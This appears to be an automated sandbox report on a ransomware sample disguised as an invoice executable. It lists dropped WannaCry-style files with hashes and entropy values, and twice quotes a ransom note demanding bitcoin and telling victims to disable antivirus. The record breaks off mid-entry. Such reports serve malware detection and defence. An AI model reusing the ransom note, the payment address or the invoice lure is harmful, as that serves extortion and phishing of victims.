                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.858690640183778
                                                          Encrypted:false
                                                          SSDEEP:24:bkCOuswUdT9J4/t2nE668lEECuefUFqbbC9x3p1jBTylNj2YbWhaO776Qn:bkCJswUdT9JWt2nEQEEkaq69ZBG/6asN
                                                          MD5:715EB04BB36015A6B880A7E18B4850EF
                                                          SHA1:AD37052046B3BEEDC8DB87AB9458AC5E079860C6
                                                          SHA-256:47979895D17FEA64797BC184D11E7502A09FAB108B3514D7C5ED549DB30A6159
                                                          SHA-512:DCEA26EE924D186532FAEF5C7FBB0492D43DCDBCB1BC95568F0677FD3471D79F893801494C38341D14B7C5CBF95782467549213B2D9A2E93DCD2D636387B2C9B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.796433958163932
                                                          Encrypted:false
                                                          SSDEEP:24:tqa3zgyJjFt930WONc/eA8fRJBRecBHkhxOVX9KX4xIyp6F:tqOhFt9sS85JBgcGxO5oXeIyYF
                                                          MD5:E2C00131F909FE4E42CB182642A9DD32
                                                          SHA1:71ADAB836A6A366EA05B3B7D1241A5FC953A98A1
                                                          SHA-256:6B225032D4D58F79369B0C3351D110832D852738AD0B236ADE745D4E15839287
                                                          SHA-512:E6F58B02C8470F00F840FD899F5EA9A5CFC2957BE4DD7F006BF33E52C8F3D38BB23FEEE040CE3A79C539B6B1ECAB5CBAE1FF8ED21B3CEF4C1FC7DCA6DF46C534
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.832514990313752
                                                          Encrypted:false
                                                          SSDEEP:24:bklWQ+wYMip78VhhQhksXGm3pY06UFkbsmzkRPbDJd6zZBoD7jq+dH1P9eOB5:bklWtwYMiGjZs2GJ6sVbDJOfc7jqqVwo
                                                          MD5:63EA01A55A44A6A13149BA61924F4A58
                                                          SHA1:60EBACF02CDDBA0DDF02735E026F3D3B3A267962
                                                          SHA-256:4F5446989D99F1E899FBD1CFDC3521F4F8C423A7A63EFE28AE1FFC8D3400F8EB
                                                          SHA-512:25F10DC640D524344ABC3A5B44A651835A57C969E8668101EA551A0EEFD8288BB7324F47C2A4BED606862A75EA6ED126708FF248EFED85117F9EC98E28C8D188
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          SSDEEP:12:8p9lRXpzYNbBmxCV9nRDTUobjAcIeooldJOdJAmV:8NYfJ/ZAcdDJYJAm
                                                          MD5:B260B5F1DA21A21030CF78AD377BA719
                                                          SHA1:AAF3ED1310E06DDA913464C27E844D68FB0B5E0D
                                                          SHA-256:14F95E9431CBBB8518EAA828AE01EDFE5E464C305DFB319E551AFDA47217E348
                                                          SHA-512:D9E2D44C383ADF16F20D2E704C4D2755F109E84D12E628B1C0A1C288BE5A8E8A0F69AA0A1A372932A240BFA001EB3EB0B82A8BDAE66E720F29E02C93281B6258
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.... ...V...kH..d?..kH...X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...%g..kH...k..kH....t.2......J.. .@WANAD~1.EXE..X......0XnW0XnW....S.........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W............/.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......927537...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.782252994580477
                                                          Encrypted:false
                                                          SSDEEP:24:Qf26G7obyAr2qPiBGLWN/PMytcrWDS9asbh7fEi:BUyAKqPiFWRrWbACi
                                                          MD5:32BCBD5C41C7B80F3C9CB2316F848ABB
                                                          SHA1:25B4E70583A98EF40F0C9CD68AE9250F5DFF229A
                                                          SHA-256:B69412CDD54229ED9E09471BA62DD506F2C7B9F5C7D64D6BD9C91540234D94AD
                                                          SHA-512:46DAC914E59BE4F5DA639737B7CFE7663E30CABAE54C323D64B20C128D03A3F1806C94B812C480A67A39803EED001E054F66FF3610A3419B26B4D349813E6F13
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8464708085417465
                                                          Encrypted:false
                                                          SSDEEP:24:bkzYT6W4uEIa0gjqviZoPs6DQxRiBFx2qyq4y/QmGoi3ccBhb5GzrmL:bkO6WU9wsopDQxuFryq4yh63tBhbAzrq
                                                          MD5:7E99F4B545CCF89AF4EB30B50341A749
                                                          SHA1:AE3D1F987F8058DE7DDA174EBAE933D176BEE88B
                                                          SHA-256:D60E42040E9D13D5E7760623049B06971AF14E3261E66BFCFAD44A74018B22A6
                                                          SHA-512:F31C58C610DEE48768D39F1A326160EED205787C3E4CCB49A1834A378AEA616AA251FC5F8B4A37540F9BBCA5670E431EC9B195430265F3A33DBF79B5E9C2FB64
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.81852808756566
                                                          Encrypted:false
                                                          SSDEEP:24:HMlnB6eczFAOOLFmOa0FVtQAKh3GCj0l88e2efmfVBa:A3cvO5xoACGCj0lNUfQC
                                                          MD5:84F7A2B880AE174CC4551756013B3B54
                                                          SHA1:F9D9E1DBB0EC1407F8310522B488261548253E45
                                                          SHA-256:2F8F4D197948FE948FF9789EE130F8D6147F6167C0F49C0854D3BC36128F341A
                                                          SHA-512:94514F78CA07E2673BDBD287CB8F801E4DEC34D302E2A5FD57E157F14BF08A78BAD38A971E7E0DE64CE5C9A77BBF54D9AA881D109E0910F8B910FA1155E56BAC
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.8660267049541694
                                                          Encrypted:false
                                                          SSDEEP:24:bk/krBbF6oC+9eeB/W1n4zlFCLD912cK6UmnTPPi1myY261yfVn:bk/WBbJFK6CN1Y0DGRyI
                                                          MD5:B6351C2137616149218D2F772A5912A1
                                                          SHA1:0B825BCD1C063AF2DB647F3D16891595A6B42285
                                                          SHA-256:5E728AADE656F5898297A088A6B8E685D63AE23BCD61E19E9B45D9B506ED6494
                                                          SHA-512:70E4EF3716E80F324AED35ED31C9B837853A639B29C24538A9477BA039AE69220189B2A47CA86D49B96FFE09B152D74EF1C248C7527401C1563A2E4CF8664FCD
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.82126842594817
                                                          Encrypted:false
                                                          SSDEEP:24:ZNkHLExWn9gcKhbdV1XNECwzGphnEWFfeP5yLXTOK7GRTx4:j+EILybj8HQhnA5mhGRW
                                                          MD5:5E2FA6BCCD72E2339910C266102B9D95
                                                          SHA1:A85DFA83764C7D43C361C919DF5A3D61C5232687
                                                          SHA-256:2FD7B3CD2AA0088EA92E23CC05CC254AE0F3E15CD5ADAE8F8B1E13C3F91CD0CA
                                                          SHA-512:38E1F7391114994CDF9A7D7324DF990226601BCB5F3E4F5FEE3B08F5C9F4725B77E9E2ECC538DF35C462687F0AEC8B59521ABDAD0EE6DC875DD8FD162FD0CE8E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.824738999690493
                                                          Encrypted:false
                                                          SSDEEP:24:bkzyh1HBqbdVbwiSGxUZvP5O8mMMbVW0jm3W8ebVIC8jNR55pFncVS:bkGDhqbzblsdxkVBw/eF8Bd
                                                          MD5:E7EFFFFB6872669266924568EA3F0FCD
                                                          SHA1:2088181CECC4BE85456B2779F6ADAF470917EA18
                                                          SHA-256:E333ADD88CBB558F616125CAE7A9FBCF1D5D4CADAA1C0FEB4922363BCCBCE85C
                                                          SHA-512:8635B888B681031EF8512C83D74C683C994C5452112B9AC6B77E95C47E5545811B28E343026438E66F0057FA8A55665B747790FF06761DEB2FB9E5470831DD47
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.817610163643991
                                                          Encrypted:false
                                                          SSDEEP:24:ScFgx3uPkuakUndwpAzK9GqlSkKx0o/NUDI94sezvf:3FIe8pdJu9VWNkIvg3
                                                          MD5:F5F81660FE1310BD8C724E6E20EBF545
                                                          SHA1:8B01AFD147AA7C1F63C8777FAC0EC5E2541EDD3F
                                                          SHA-256:3794B37F75980A2B3D98221F96822604EACBC6054DEF7D407F0C155EB234B455
                                                          SHA-512:C6F7D2BE60D4FE8BEB93B50F75AC4485A337CB6F4E01619318D2376AB36EFEDB532E26180ECC77FD29D991C9DAC20EAD4DC44D009CFD4D2FEE446DB5C8C0B5E6
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.835334446692858
                                                          Encrypted:false
                                                          SSDEEP:24:bk76jSpRanqnS4Gt6ljWQT8roxmny69LphCKs+6WrV+vR08AY9kgeCwILUvkMAMd:bkkSeT+juoxmyOpIIbpm0vgk2wIckBA
                                                          MD5:5C3563FC1006045A7FBBBB615FFDE551
                                                          SHA1:AC9515E5F285D6ACE2BDA3B10EE04B0EF2E5ED96
                                                          SHA-256:D137A197D301A3BF1B40FFF821218693324FE2627F569554F4FD2D831D9A5714
                                                          SHA-512:42AA87BFFC3290044E7E1F2FC957D3F6D1C0A5875A77DEE2EFA11ECF9E6FF8D348AAC4F71DCA970E05AA0D5C8C8C5FFC283F35D751AE67670180243B8A44A024
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.824193176060253
                                                          Encrypted:false
                                                          SSDEEP:24:OahszzHUchuEkke5581nqlBndsOXtSexowtGjgQ9D8LZrOfYZACC6s:/scTEkvQqlBWedcgQ9aOcCJ
                                                          MD5:CE809ED94E41990DABFCA8234D0B5735
                                                          SHA1:60DEACD34E8C524A495E3B0675915BEF958F67A2
                                                          SHA-256:D1C0FC9897B7DE837B47E28F05B8879608CB28B1FBC4E452072C65844375B941
                                                          SHA-512:DE833F95DFFACAEC9302A94907DA86F74288C6E4E40EA97E668A19EF9C221088A7A32F07BA07CB47ABF694E905619291B52B926E51FF9CBFCE555AEB1360B10E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.865557663817537
                                                          Encrypted:false
                                                          SSDEEP:24:bk8LCIblJO79SeGPv0EV6CNFR1jBv47EuzjzusMv2+QcXFGfeBvG5ZHh4xh1LPm:bkaYxSeQxMC3XaguzjzusMe+RUU+LHIm
                                                          MD5:E75BDBBEB548F20430642166C8A22956
                                                          SHA1:3761C4E9D358F9F5B5C837EAFFDDEED5FF0AF875
                                                          SHA-256:C756920BBAD521DACF87517CFF65A60A4A25A2BBF72F23F873767FCE7514A6F2
                                                          SHA-512:EE1D192D850869073645F181C5F204F63523458E318EF1622924EE37D5FE311F0A4872205B04EEAB3D38AE44E9DF628FBF105A1AE23331CD0AC72877CE20CD2E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.835256169210775
                                                          Encrypted:false
                                                          SSDEEP:24:wQtDzA+/3XXb5MEJpl/ULpFpqvWnLhFzOowu1iJwnbtTTUXVTRT:btDzR/3bDhUfhIkEwnGVTRT
                                                          MD5:ED11E13DDEC4CB23F44CE3A765606D70
                                                          SHA1:0A4837C6E9FFFC0D2AF9A54195F096BD60621D11
                                                          SHA-256:B5467290B6D406BA071F0933BEA85A236DFA1CC1634CCF7778BD3041CA2412F5
                                                          SHA-512:244AB579FFE769E7ACC12B8B799217F7C6AE9B1298F471E7B9DAE0391110B41B84269B42CCD7FA81BA08DDCBA9B43CFAB0BBFF3753E39A1F9F5F86A265F1FF4A
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.877005446341921
                                                          Encrypted:false
                                                          SSDEEP:24:bkSGw6jRXVMvrc60XEkxc8IHkU8x6QmTsaxedwOavfmCwIMA9oSDtT:bk3LOaX+E1eEKvuCwvA9ztT
                                                          MD5:9D676B89E53BB31A5BEA2C2379282558
                                                          SHA1:58AB7872884DD02A0343B69F5D1772F9A3A2B4E0
                                                          SHA-256:F3646C9B9E96988D8BE7E1C4A4A8C2190B2364303D4CACE95819D575DE4C137E
                                                          SHA-512:235C8C4793BC41045415E049966E59D88AC5766C13FF2A125DC76DA6C7C61C0059B7B08527D00C78F4EBDB9D413EF00800365735418DD70D624E510CF933216B
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.789710739446829
                                                          Encrypted:false
                                                          SSDEEP:24:53KV8andSWgEM7lLnhrCJoKgbg27f/MPSxPnpfkXrHU:56VXtA7lLnhrCvAuCPn1kXr0
                                                          MD5:C587FFC44075D235F3CF888592089B8F
                                                          SHA1:1714F0AE1B6F8931D62DDF9B4F14429C4622AB2E
                                                          SHA-256:D461AAE5215EB856A7D54A573A14194A0BC18CD8859CC8E1E72140855FCE0571
                                                          SHA-512:FC2126ADBA9C705E33BB0316554264C0E075E9438F81A3DA4872DA710957DECDB69DD5CBBE57C09C1B0300D0C0EF82A1BB46561A3F085FD3731BD05818E6381E
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.855853802680026
                                                          Encrypted:false
                                                          SSDEEP:24:bkyE/YeWbhYZhIhY3Ia+q0MMdvGXHDTemx89AgftRilACGxx3OeP6t:bkvwbbCZShDbq0MMdOTTwAgWXGxbit
                                                          MD5:467299C5B41836023F08A3344E61BCBA
                                                          SHA1:04E1071C0F4246E55917258E371C95C5FC719ED4
                                                          SHA-256:A411EC3632FAA5A2749B563A94D8D6654D75C5E52A77D3E4F094A014E5E1917B
                                                          SHA-512:0049A6F4F862EAAD594606012E4A28584C431179DECB09CD2970C847B936A0630BB2F64C77D39FAFC5F8443D49A3942C614CC06A72603DBEC0C34E4AD75773B8
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:WANACRY!
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):933
                                                          Entropy (8bit):4.711824502619554
                                                          Encrypted:false
                                                          SSDEEP:24:ptrPzDVR5Gi3OzGm0EigS1xbnGhRQhbrW8PNAi0eEprY+Ai75wRZcet:DZD36W3KghvWmMo+S
                                                          MD5:7A2726BB6E6A79FB1D092B7F2B688AF0
                                                          SHA1:B3EFFADCE8B76AEE8CD6CE2ECCBB8701797468A2
                                                          SHA-256:840AB19C411C918EA3E7526D0DF4B9CB002DE5EA15E854389285DF0D1EA9A8E5
                                                          SHA-512:4E107F661E6BE183659FDD265E131A64CCE2112D842226305F6B111D00109A970FDA0B5ABFB1DAA9F64428E445E3B472332392435707C9AEBBFE94C480C72E54
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:Q: What's wrong with my files?....A: Ooops, your important files are encrypted. It means you will not be able to access them anymore until they are decrypted... If you follow our instructions, we guarantee that you can decrypt all your files quickly and safely!.. Let's start decrypting!....Q: What do I do?....A: First, you need to pay service fees for the decryption... Please send $300 worth of bitcoin to this bitcoin address: 12t9YDPgwueZ9NyMgw519p7AA8isjr6SMw.... Next, please find an application file named "@WanaDecryptor@.exe". It is the decrypt software... Run and follow the instructions! (You may need to disable your antivirus for a while.).. ..Q: How can I trust?....A: Don't worry about decryption... We will decrypt your files surely because nobody will trust us if we cheat users... ....* If you need our assistance, send a message by clicking <Contact Us> on the decryptor window....
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Archive, ctime=Tue Jan 16 09:59:27 2024, mtime=Tue Jan 16 09:59:27 2024, atime=Fri May 12 00:22:56 2017, length=245760, window=hide
                                                          Category:dropped
                                                          Size (bytes):575
                                                          Entropy (8bit):5.140087190146179
                                                          Encrypted:false
                                                          SSDEEP:12:8p9lRXpzYNbBmxCV9nRDTUobjAcIeooldJOdJAmV:8NYfJ/ZAcdDJYJAm
                                                          MD5:B260B5F1DA21A21030CF78AD377BA719
                                                          SHA1:AAF3ED1310E06DDA913464C27E844D68FB0B5E0D
                                                          SHA-256:14F95E9431CBBB8518EAA828AE01EDFE5E464C305DFB319E551AFDA47217E348
                                                          SHA-512:D9E2D44C383ADF16F20D2E704C4D2755F109E84D12E628B1C0A1C288BE5A8E8A0F69AA0A1A372932A240BFA001EB3EB0B82A8BDAE66E720F29E02C93281B6258
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Preview:L..................F.... ...V...kH..d?..kH...X.H.................................P.O. .:i.....+00.:...:..,.LB.)...A&...&.........{4...%g..kH...k..kH....t.2......J.. .@WANAD~1.EXE..X......0XnW0XnW....S.........................@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.......X...............-.......W............/.......C:\Users\user\Desktop\@WanaDecryptor@.exe......\.@.W.a.n.a.D.e.c.r.y.p.t.o.r.@...e.x.e.`.......X.......927537...........hT..CrF.f4... ...0.+d...,....%..hT..CrF.f4... ...0.+d...,....%.E.......9...1SPS..mD..pH.H@..=x.....h....H.....K...YM...?................
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):271360
                                                          Entropy (8bit):7.999251702688857
                                                          Encrypted:true
                                                          SSDEEP:6144:nm+2KG2DxX4i2d5WYgYOK5PTYREt/j+Z9qpvyWYJlG5mmM:nm+BBxuaYhX7OA/jigpvu3G5mmM
                                                          MD5:B103D8F0B3532D62D3C2EC56EFA2C68A
                                                          SHA1:ADD37CA55017F6C48C2DC0075BFFD6E539E2658E
                                                          SHA-256:AABDAEDD41777838A2AFC22434DE19B8EBC46992ABD32987FEB6E28D2DD7DA65
                                                          SHA-512:3FAC126233C5DE65AE0934FEB6053F433CEE9E9BDE0CF6EF98C4F91A9E7184E1DD44368B7104FEFD6408D65F48806777FBD1E226D82F4A38C13A9BB43489900A
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):271640
                                                          Entropy (8bit):7.9992626317546405
                                                          Encrypted:true
                                                          SSDEEP:6144:KnY1QI4S4Mf/HBROcvaXO6OhV7upuziNogl:KH3MxRjitm1uphF
                                                          MD5:05111181DCC11BC255511485B4FCEE87
                                                          SHA1:4751AA414B5075A30A4E5997F0250CD4DF845472
                                                          SHA-256:3C748993E7FD23EABFA53101AFFFE475A34EA6778303AD4734E03453B5DB3B00
                                                          SHA-512:8ED921166B70FEE10EB5A6F4E9989767CFC7BF4D81A0568E1ADA75C90014E7F4DA568A0CF4F509A3E0FDE013086E430AA9A04137500CD4DF6C0F123988E0DA7F
                                                          Malicious:true
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.811154944660018
                                                          Encrypted:false
                                                          SSDEEP:24:+vsunKW+c6jQiFxSePvnbvPY0Fu0VCEkR1bUhj9:1aSBUO3PvbvQ0KN74D
                                                          MD5:538C27E0F6B1001FD601196518FEE4D8
                                                          SHA1:6D5D5F0F81107F3D9918148816496944BED85A50
                                                          SHA-256:0B430FA884CD62DBAC765F89B8784D25BFD82B9C503126A3CF383A23C18991DC
                                                          SHA-512:118C8A9FB63E9DA7CC262C93997339CF622D0A9149C1E5CD82D658E7241773577D31E17644B64CE801AD08924B11606B5D14197F647688EA3272110F51EB438F
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.854290632279905
                                                          Encrypted:false
                                                          SSDEEP:24:bkw2OSUWQ0GGAVN2/0MDKVRk+FSaEe/3QMhYi/vkb0mSTD11qT+:bk7OSHQ0uS/ZKc+FSG/3QMhYysQWK
                                                          MD5:BB99840A84409677E057E126DA476185
                                                          SHA1:8C0D67778E091480B1F1EA6D5A60C334D552101D
                                                          SHA-256:158F26FDC3BBF49CA1104033FA853141C443C54C2750E5C7DE6650122426A4DB
                                                          SHA-512:59A29D6C6B85F6F97F76EA6CE54D48CE03F13B162A823539D858C4DCD375C0619043793312B92388D00FFD04781E55EE6434B8175FE85526A7B54668A02D87D9
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.810758549870751
                                                          Encrypted:false
                                                          SSDEEP:24:9d90c6w7EJRBjg1hPnCXFghSRhIL36doDeJg5cTQ7w5eIFhyyti:9d9v6zX+HCSh2SLqdeeJ7AIFzi
                                                          MD5:A8FB0D9DA12BC0ED3069A43F9523A76E
                                                          SHA1:64F12CB25542A4185A09A3CC01FBE01333A288F5
                                                          SHA-256:B3ACE87709EF359B262C7C91E4466D7C970651D348DEB75A25F28C386B7CB2B8
                                                          SHA-512:90722DAA590FAEFAE52FCFA3A02DC7F757B890EB90DF68937A86FB122ED50A5298E0F863ABF6B0612563A586ED3F85DD3B108E3D058451BAE98600842F310988
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.829092780690106
                                                          Encrypted:false
                                                          SSDEEP:24:bkwiflOlGjt2boMa7+DudGL/vuUdD7gccdHn6EsElijZejeJVxbnlui0nfBfQRA/:bkwylJ2bM7hgL3uUdD7gccN6D+iQiAdd
                                                          MD5:718E37FA552AF943FFF075CD6FD0FE48
                                                          SHA1:459B7082E366488E219C51531770555FFE56B85A
                                                          SHA-256:C0DBD19DEBB562BD1C94C726DB6D870C6C0D9A9F517A18FAE1798040877268B9
                                                          SHA-512:54BCACCD1F0DA0FC523FC3587F5613A8DD0816AA68F31FBABC0F4B71C8A7C2AA60B2FC516196969D896B628085E2E81F232F92D30D587B7F9DA7E9BD8A417245
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.81348050833733
                                                          Encrypted:false
                                                          SSDEEP:24:IZmmNtOsTXd6dcYWI+l8FdUhzGxgiciItOW5LGQkNl6pMSVqG8dcKr/ZZmPXjA3L:IZtXXdycYY2whCxht8OsqzNXSVqGNwZp
                                                          MD5:D0ED687EBF08BA1A0EA29BAB2BFCE09C
                                                          SHA1:FF4D4CC06F96BA11D63E4F35F315E6D277FB4D8E
                                                          SHA-256:C78B3B0B08E8D5D604B5885BDA88D7BA8FE7ADD8CE3E7F26EBF7FCFBCC791023
                                                          SHA-512:3E6A94EE9844445A8B05F4898213ABA6C834ECB61831B478D5409900A2B34157ACAE51B6724895B837173B59974077B30104858B5A48C0BAC6C2B211C725E411
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1320
                                                          Entropy (8bit):7.858307702636891
                                                          Encrypted:false
                                                          SSDEEP:24:bkVzyv0EHujK0Dsi/BvE7ygVzYaFp5guFmPN5/JwRe8ukSH+lFFudMMA/rvvDEF/:bkVzrEOjxDsUBc7ygRYaFhaN5/2s8ukE
                                                          MD5:FFFE57061F92D300A2A20313E5448690
                                                          SHA1:AA432BD3E2D119BA9273CEAEA9BA452309706BA6
                                                          SHA-256:8CBBED3C9B05AC969170095890A4AC4972E2A417B2998056BFE989B53208AAFE
                                                          SHA-512:78D905BB7048C805446F16DFD625D8B5E736D56FBDCF70E9AA068435DE79BACD594135BBD8D4FB577485D87271983BE4BD5B90F220ED4AAC6C066BC77FD7780D
                                                          Malicious:false
                                                          Reputation:unknown
                                                          Process:C:\Users\user\Desktop\Proforma Invoice and Bank swift-REG.PI-0086547654.exe
                                                          File Type:data
                                                          Category:dropped
                                                          Size (bytes):1026
                                                          Entropy (8bit):7.812570552682323
                                                          Encrypted:false
                                                          SSDEEP:24:/z0FvCmTWgFZMqkIqkKwNHLd+Cx7UzBk62ThXueoePGnOJzn:/Iw6cqk6KwVdXA9kPTYeFPG6z
                                                          MD5:7D3B85F2F7A55D2CFD430DF3531406F9
                                                          SHA1:B001604DCCD7FA6E7326C9AC82974FEDD09A7A11
                                                          SHA-256:2FC0FB7D1E1DAF799884C1D98AF119A5C0B24D824EB9B144A5055C35A327DE13
